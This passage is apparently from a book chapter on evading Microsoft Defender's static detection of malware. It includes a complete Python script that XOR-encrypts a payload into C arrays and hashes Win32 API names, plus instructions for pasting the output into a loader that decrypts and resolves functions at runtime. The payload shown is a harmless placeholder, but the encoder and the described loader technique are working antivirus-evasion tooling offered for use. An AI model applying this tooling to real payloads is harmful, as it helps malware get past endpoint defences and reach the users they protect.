Evading static detection
Signature-based detection is simple to circumvent, although doing so is time-consuming. It is essential not to hardcode into the malware any value that could be used to uniquely identify the implementation: plaintext API names, the unencrypted payload, fixed strings, and so on. As mentioned earlier, the code presented throughout this chapter retrieves or calculates such values dynamically at runtime instead.
Practical example
Let's look at how to circumvent Microsoft Defender's static analysis engine using XOR encryption of the payload and function call obfuscation. At this stage, the payload is simply a pop-up Hello World message box, so the focus is on static/signature evasion rather than on runtime behaviour.
To encrypt the hello.bin payload and obfuscate function names, we can use the following Python script:
import sys
import os
import hashlib
import string

## XOR function to encrypt data
## The key is repeated cyclically over the data; because XOR is its own
## inverse, the same function decrypts the output when given the same key.
def xor(data, key):
    key = str(key)
    l = len(key)
    output_str = ""

    for i in range(len(data)):
        current = data[i]
        current_key = key[i % l]
        output_str += chr(ord(current) ^ ord(current_key))

    return output_str

# ... (the remainder of the script is not reproduced here)
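The following is an added, self-contained example (not the book's script) of the two tricks this section describes: repeating-key XOR encryption of the payload, emitted as a C array for the loader, and function-name hashing so the loader can resolve Win32 APIs by hash at runtime instead of carrying their plaintext names. The payload bytes are a constructed placeholder standing in for hello.bin, the key is arbitrary, and the hash scheme (SHA-256 truncated to 32 bits, little-endian) is my own choice; the page does not prescribe one. The self-check at the end mimics a string-based signature by looking for the plaintext markers in the encrypted blob.

```python
#!/usr/bin/env python3
"""Added example: XOR-encrypt a payload for a C loader and hash API names.

Assumptions (not from the page): PAYLOAD is a constructed stand-in for
hello.bin, KEY is arbitrary, and api_hash() uses SHA-256 truncated to
32 bits as the hashing scheme.
"""
import hashlib
from typing import Iterable, Sequence


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR. XOR is its own inverse, so this also decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def to_c_array(name: str, data: bytes, per_line: int = 12) -> str:
    """Render bytes as an unsigned char[] initialiser plus a length constant."""
    lines = []
    for i in range(0, len(data), per_line):
        chunk = data[i:i + per_line]
        lines.append("    " + ", ".join(f"0x{b:02x}" for b in chunk) + ",")
    body = "\n".join(lines)
    return (f"unsigned char {name}[] = {{\n{body}\n}};\n"
            f"unsigned int {name}_len = {len(data)};")


def api_hash(name: str) -> int:
    """32-bit hash of an ASCII API name (assumed scheme: SHA-256 truncated).

    The loader computes the same hash over each export name it walks and
    compares against these constants, so the plaintext name never appears
    in the binary.
    """
    digest = hashlib.sha256(name.encode("ascii")).digest()
    return int.from_bytes(digest[:4], "little")


def emit_hash_defines(names: Iterable[str]) -> str:
    """C #defines for the loader, one per API name."""
    return "\n".join(f"#define H_{n.upper()} 0x{api_hash(n):08x}" for n in names)


def has_plaintext_markers(blob: bytes, markers: Sequence[str]) -> bool:
    """Crude stand-in for a string signature: does any marker survive in blob?"""
    return any(m.encode("ascii") in blob for m in markers)


# Constructed placeholder for hello.bin, not real shellcode.
PAYLOAD = b"Meow-meow!\x00" + bytes(range(0x30, 0x3a)) + b"MessageBoxA\x00"
KEY = b"mysecretkey"
API_NAMES = ["LoadLibraryA", "GetProcAddress", "MessageBoxA"]
MARKERS = ["Meow", "MessageBoxA"]


def build_loader_fragment() -> str:
    """Encrypt PAYLOAD, verify the round trip, and emit the C fragment."""
    enc = xor_bytes(PAYLOAD, KEY)
    assert xor_bytes(enc, KEY) == PAYLOAD  # decryption must recover the payload
    return "\n\n".join([
        to_c_array("my_payload", enc),
        to_c_array("my_key", KEY),
        emit_hash_defines(API_NAMES),
    ])


if __name__ == "__main__":
    print(build_loader_fragment())
    encrypted = xor_bytes(PAYLOAD, KEY)
    print("// plaintext markers visible before encryption:",
          has_plaintext_markers(PAYLOAD, MARKERS))
    print("// plaintext markers visible after encryption:",
          has_plaintext_markers(encrypted, MARKERS))
```

Paste the printed fragment into the loader, XOR `my_payload` with `my_key` at runtime, and resolve each API by walking the export table and comparing `api_hash()` of every name against the `H_*` constants. Note that the key itself is still a constant in the binary; static evasion only holds while the key and the hashing scheme are not themselves signatured.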